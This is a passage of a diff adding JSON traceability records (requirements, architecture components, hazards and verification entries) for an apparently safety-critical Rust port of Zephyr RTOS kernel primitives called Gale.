+      "title": "Fatal module (gale::fatal)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Full Zephyr kernel pipe test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_PIPE=y. Tests exercise the complete k_pipe API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suites: zephyr/tests/kernel/pipe (basic, concurrency, stress).\n",
+      "id": "SV-PP-001",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Pipe Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Post can only set bits, never clear them. The resulting value after post always has a superset of the bits that were set before.\n",
+      "id": "SWREQ-EV-EV08",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "post",
+        "monotonic",
+        "asil-d"
+      ],
+      "title": "EV8: post monotonic",
+      "type": "sw-req"
+    },
+    {
+      "description": "Meta-IRQ priority threads can preempt even cooperative threads, providing a mechanism for ISR-like urgency in thread context.\n",
+      "id": "SWREQ-SC-SC15",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "meta-irq",
+        "asil-d"
+      ],
+      "title": "SC15: meta-IRQ threads preempt cooperative threads",
+      "type": "sw-req"
+    },
+    {
+      "description": "Fixed-block memory pool model with init/alloc/free/alloc_many/free_many. Tracks allocation count against capacity. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-MP-001",
+      "links": [
+        {
+          "target": "SWREQ-MP-MP01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MP-MP02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MP-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "architecture"
+      ],
+      "title": "Memory pool module (gale::mempool)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Unit tests in plain/src/queue.rs covering init, append/prepend/get operations, empty boundary condition, roundtrip, and count tracking.\n",
+      "id": "UV-QU-001",
+      "links": [
+        {
+          "target": "SWDD-QU-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-QU-APPEND",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-QU-PREPEND",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-QU-GET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Queue unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus-verified src/mem_domain.rs with requires/ensures contracts covering partition non-overlap invariant, alignment constraints, slot arithmetic and u32 address overflow bounds (MD1-MD6). Loop restructured to inline returns; preconditions added for safe arithmetic. Passing via bazel test //:verus_test.\n",
+      "id": "FV-MD-001",
+      "links": [
+        {
+          "target": "SWREQ-MD-MD01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MD-MD02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MD-MD03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MD-MD04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MD-MD05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MD-MD06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "MemDomain Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The stack top address (base + size) must not overflow the u32 address space.\n",
+      "id": "SWREQ-SKS-SK03",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "SK_S3: base + size doesn't overflow u32",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr fatal error classification and halt tests executed on qemu_cortex_m3. Validates that fatal error reason codes, essential thread detection, and ISR-context halt decisions operate correctly with Gale integration. Test suite: zephyr/tests/kernel/fatal.\n",
+      "id": "SV-FT-001",
+      "links": [
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Fatal Error Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random push/pop operation sequences on stack. Coverage-guided mutation testing.\n",
+      "id": "UV-SK-005",
+      "links": [
+        {
+          "target": "SWDD-SK-PUSH",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-POP",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "Stack fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall support memory pools with fixed block sizes, where all blocks within a pool are of identical size to ensure O(1) allocation and deallocation.\n",
+      "id": "ZEP-SRS-MP-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MP",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mempool"
+      ],
+      "title": "Zephyr: Memory Pool Block Size Classes",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Tick counter or timeout delta arithmetic wraps around, causing a timeout to expire at the wrong time (too early or never), which may either falsely release a blocked safety thread or permanently suppress a required wakeup.\n",
+      "id": "H-6",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "overflow",
+        "timeout",
+        "timer"
+      ],
+      "title": "Integer overflow in timeout or timer arithmetic",
+      "type": "hazard"
+    },
+    {
+      "description": "The system shall implement a mailbox synchronization primitive for synchronous message passing between threads.\n",
+      "id": "ZEP-SYRS-MB",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mbox"
+      ],
+      "title": "Zephyr: Mailbox",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/event_integration.rs exercising the full event API surface across module boundaries. Tests post OR semantics, set replacement, clear AND-complement, set_masked selective update, wait_any/wait_all conditions, combined operation sequences, and bitmask boundary conditions.\n",
+      "id": "IV-EV-001",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Event integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "A kernel object permission model that matches Zephyr's userspace.c semantics: object validation, per-thread permission bitmask, grant/revoke access, initialization tracking, and supervisor bypass.\n",
+      "id": "SYSREQ-US-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "kernel"
+      ],
+      "title": "Userspace syscall validation and permission model",
+      "type": "system-req"
+    },
+    {
+      "description": "Integration tests in tests/queue_integration.rs exercising the full queue API surface across module boundaries. Tests init, append/prepend/get sequences, empty-get error path, mixed append/prepend ordering, interleaved operations, and stress cycles.\n",
+      "id": "IV-QU-001",
+      "links": [
+        {
+          "target": "SWARCH-QU-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Queue integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Time-slicing model with per-thread and global slice durations, eligibility determination, and expiry-triggered round-robin rotation. Tracks slice configuration, thread eligibility, and rotation state. Actual timeout management, spinlocks, and IPI coordination stays in C — Gale verifies eligibility logic, duration selection, and rotation correctness only. No unsafe code.\n",
+      "id": "SWARCH-TS-001",
+      "links": [
+        {
+          "target": "SWREQ-TS-TS01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TS-TS02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TS-TS04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-TS-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "architecture"
+      ],
+      "title": "Timeslice module (gale::timeslice)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Zephyr's thread-safe LIFO stack for stack_data_t values.  Contains k_stack_init, z_impl_k_stack_push, z_impl_k_stack_pop.  The Gale port models a bounded counter (count/capacity) — actual data stays in C.\n",
+      "id": "PROV-SK-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "stack",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/stack.c — LIFO stack implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Priority-ordered wait queue using heapless::Vec<Thread, 64>. Provides pend (sorted insert), unpend_first (dequeue highest-priority), and unpend_all (wake everyone).  Replaces Zephyr's _wait_q_t linked list.\n",
+      "id": "SWARCH-WQ-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-WQ-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "wait-queue",
+        "architecture"
+      ],
+      "title": "Wait queue module (gale::wait_queue)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "The Zephyr RTOS shall enforce a configurable time quantum (slice duration) per thread, rotating the current thread to the end of its priority queue when the slice expires.\n",
+      "id": "ZEP-SRS-TS-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TS",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeslice"
+      ],
+      "title": "Zephyr: Time Quantum Enforcement",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall allow threads to block when allocating from an exhausted memory slab, with a configurable timeout after which an error is returned.\n",
+      "id": "ZEP-SRS-MS-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MS",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mem-slab"
+      ],
+      "title": "Zephyr: Memory Slab Blocking Allocation with Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a blocking pop operation on a stack, with a configurable timeout period allowing threads to wait until an entry is available.\n",
+      "id": "ZEP-SRS-SK-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-SK-SK05",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-SK-SK06",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "stack"
+      ],
+      "title": "Zephyr: Stack Blocking Pop With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A device that is already initialized cannot be initialized again. Double-init returns EBUSY.\n",
+      "id": "SWREQ-DI-DI05",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "safety",
+        "asil-d"
+      ],
+      "title": "DI5: no double-init (idempotence)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism allowing threads to release a semaphore.\n",
+      "id": "ZEP-SRS-5-12",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore release",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "ARM Cortex-M CFSR/HFSR/MMFAR/BFAR fault register decode. Based on the ARMv7-M Architecture Reference Manual (B3.2.15). No single upstream C file — semantics ported from architecture specification and Zephyr's arch/arm/core/cortex_m/fault.c.\n",
+      "id": "PROV-FD-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "fault-decode",
+        "arch",
+        "arm"
+      ],
+      "title": "ARM Cortex-M fault registers — architecture reference",
+      "type": "source-provenance"
+    },
+    {
+      "description": "priority_get: return thread.base.prio. is_preempt: return prio >= 0 && !in_isr. C source: kernel/thread.c lines 111-131.\n",
+      "id": "SWDD-TL-PRIORITY",
+      "links": [
+        {
+          "target": "SWARCH-TL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TL-TH03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TL-TH04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "priority",
+        "preempt"
+      ],
+      "title": "ThreadLifecycle::priority_get / is_preempt port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No Gale FFI function shall allocate more than 256 bytes of stack.\n",
+      "id": "SYSREQ-PERF-002",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "performance",
+        "stack"
+      ],
+      "title": "FFI stack usage bounded to 256 bytes",
+      "type": "system-req"
+    },
+    {
+      "description": "A put followed by a get returns count to its original value.\n",
+      "id": "SWREQ-FI-FI05",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "roundtrip",
+        "asil-d"
+      ],
+      "title": "FI5: put-get roundtrip preserves state",
+      "type": "sw-req"
+    },
+    {
+      "description": "Integration tests exercising add/remove roundtrips and non-overlap enforcement across module boundaries.\n",
+      "id": "IV-MD-001",
+      "links": [
+        {
+          "target": "SWARCH-MD-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "MemDomain integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Zephyr SMP CPU lifecycle and global lock tests executed on qemu_cortex_m3 with CONFIG_SMP=y. Validates CPU start/stop, global lock coordination, and multi-core scheduling with Gale integration. Test suite: zephyr/tests/kernel/smp.\n",
+      "id": "SV-SM-001",
+      "links": [
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "SMP Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Full Zephyr kernel mem_slab test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_MEM_SLAB=y. Tests exercise alloc/free with blocking, timeout, multi-thread contention through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/mem_slab/mslab.\n",
+      "id": "SV-MS-001",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "MemSlab Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all thread lifecycle code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-TL-003",
+      "links": [
+        {
+          "target": "SWREQ-TL-TH01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Thread lifecycle Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall return an error when a thread attempts to unlock a mutex it does not own.\n",
+      "id": "ZEP-SRS-MUT-4",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MUT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MUT-M06",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mutex"
+      ],
+      "title": "Zephyr: Mutex Unlock By Non-Owner Error",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Verus specifications in src/wait_queue.rs with requires/ensures clauses that formally verify wait queue properties via SMT solving. Proves priority-ordered insertion, pend/unpend correctness, sorted invariant preservation, slot validity, no-duplicate enforcement, and capacity bounds safety. Executed via: bazel test //:verus_test\n",
+      "id": "FV-WQ-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "WaitQueue Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "wait_any is satisfied when the bitwise AND of the event value and the requested mask is non-zero (at least one requested bit is set).\n",
+      "id": "SWREQ-EV-EV05",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-EV-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-EV-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-EV-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "wait-any",
+        "asil-d"
+      ],
+      "title": "EV5: wait_any condition",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall classify fatal errors into distinct reason codes (CPU exception, oops, panic, stack overflow, kernel oops) to enable appropriate recovery or halt decisions.\n",
+      "id": "ZEP-SRS-FT-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fatal"
+      ],
+      "title": "Zephyr: Fatal Error Classification",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Gale replaces Zephyr kernel primitives under the existing Zephyr v3.x public API surface.  Functional equivalence is validated via the Zephyr twister test suite run unmodified against Gale's Rust implementations.  The API contract is fixed by the Zephyr upstream headers imported via PROV-* provenance records.\n",
+      "id": "C-2",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "scopes"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "context",
+        "api"
+      ],
+      "title": "Zephyr RTOS v3.x kernel API compatibility",
+      "type": "safety-context"
+    },
+    {
+      "description": "Verus specifications in src/atomic.rs with requires/ensures clauses that formally verify atomic properties (AT1-AT6) via SMT solving. Proves CAS correctness, arithmetic operation safety, bitwise idempotence, and wrapping behavior. Executed via: bazel test //:verus_test\n",
+      "id": "FV-AT-001",
+      "links": [
+        {
+          "target": "SWREQ-AT-AT01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-AT-AT02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-AT-AT03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-AT-AT04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-AT-AT05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-AT-AT06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Atomic Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all heap code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-HP-003",
+      "links": [
+        {
+          "target": "SWREQ-HP-HP01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Heap Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When signal is called and the wait queue is non-empty, exactly one thread (the highest-priority waiter) is woken and the wait queue length decreases by 1. Maps to condvar.c:44-61.\n",
+      "id": "SWREQ-CV-C02",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-CV-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "signal",
+        "asil-d"
+      ],
+      "title": "C2: signal wakes at most one waiter (highest priority)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The FIFO item count is always non-negative. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-FI-FI01",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FI-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "FI1: 0 <= count (non-negative count)",
+      "type": "sw-req"
+    },
+    {
+      "description": "k_thread_create sets up a new thread with the specified stack, stack size, entry point, arguments, priority, and options. The thread begins in a non-started state if delay is non-zero. Maps to thread.c:785-807.\n",
+      "id": "SWREQ-TL-TH01",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TL-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "create",
+        "asil-d"
+      ],
+      "title": "TH1: create initializes thread with valid stack, entry, and priority",
+      "type": "sw-req"
+    },
+    {
+      "description": "When a poll signal is raised, the signaled flag is set to 1 and the result value is stored. Maps to poll.c:522-553.\n",
+      "id": "SWREQ-PL-PL04",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "signal",
+        "asil-d"
+      ],
+      "title": "PL4: signal_raise sets signaled flag and result",
+      "type": "sw-req"
+    },
+    {
+      "description": "remove: remove thread from run queue. best: return highest-priority (lowest numeric value) thread.\n",
+      "id": "SWDD-SC-REMOVE-BEST",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SC-SC02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC12",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "runq",
+        "remove",
+        "best"
+      ],
+      "title": "RunQueue::remove/best — runq_remove/runq_best port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Memory domain partition manager with init/add_partition/remove_partition. Maintains non-overlap invariant across up to 16 partition slots. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-MD-001",
+      "links": [
+        {
+          "target": "SWREQ-MD-MD01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MD-MD04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MD-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "architecture"
+      ],
+      "title": "Memory domain module (gale::mem_domain)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Verus specifications in src/heap.rs with requires/ensures clauses that formally verify heap properties (HP1-HP8) via SMT solving. Proves alloc/free safety, split/merge identity, coalesce correctness, and bytes_to_chunks overflow protection. Executed via: bazel test //:verus_test\n",
+      "id": "FV-HP-001",
+      "links": [
+        {
+          "target": "SWREQ-HP-HP01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-HP-HP08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Heap Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unit tests in src/stack_config.rs covering validate (valid/invalid alignment, zero size, guard >= size, overflow), usable_size, top, usable_start, is_valid_sp, is_in_guard, and is_power_of_two.\n",
+      "id": "UV-SKS-001",
+      "links": [
+        {
+          "target": "SWDD-SKS-VALIDATE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "StackConfig unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When pop is called and count == 0, returns EBUSY without modifying the stack state. Maps to stack.c:148-190.\n",
+      "id": "SWREQ-SK-SK06",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "pop",
+        "error",
+        "asil-d"
+      ],
+      "title": "SK6: pop when empty returns EBUSY, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "If num_used > 0: decrement num_used, return OK. Otherwise return EINVAL.\n",
+      "id": "SWDD-MS-FREE",
+      "links": [
+        {
+          "target": "SWARCH-MS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MS-MS06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS07",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "free"
+      ],
+      "title": "MemSlab::free — z_impl_k_mem_slab_free port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/condvar_proofs.v targeting condvar invariant preservation (signal/broadcast/wait semantics, emptying, idempotency, signal-broadcast equivalence) via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:condvar_proofs_test\n",
+      "id": "FV-CV-002",
+      "links": [
+        {
+          "target": "SWREQ-CV-C01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "CondVar Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When a block is available, alloc increments the allocated count.\n",
+      "id": "SWREQ-MP-MP02",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "MP2: alloc when allocated < capacity increments by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Recursive acquisition increments nest_count, release decrements it. The count is bounded by MAX_NEST_DEPTH (255).\n",
+      "id": "SWREQ-SL-SL03",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "nesting",
+        "asil-d"
+      ],
+      "title": "SL3: nest_count tracks depth correctly",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide blocking write and read operations on a pipe, with configurable timeout periods allowing threads to wait until buffer space or data is available.\n",
+      "id": "ZEP-SRS-PP-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-PP",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-PP-PP03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PP-PP04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "pipe"
+      ],
+      "title": "Zephyr: Pipe Blocking Write/Read With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a queue synchronization primitive for generic linked-list data exchange between threads.\n",
+      "id": "ZEP-SYRS-QU",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "queue"
+      ],
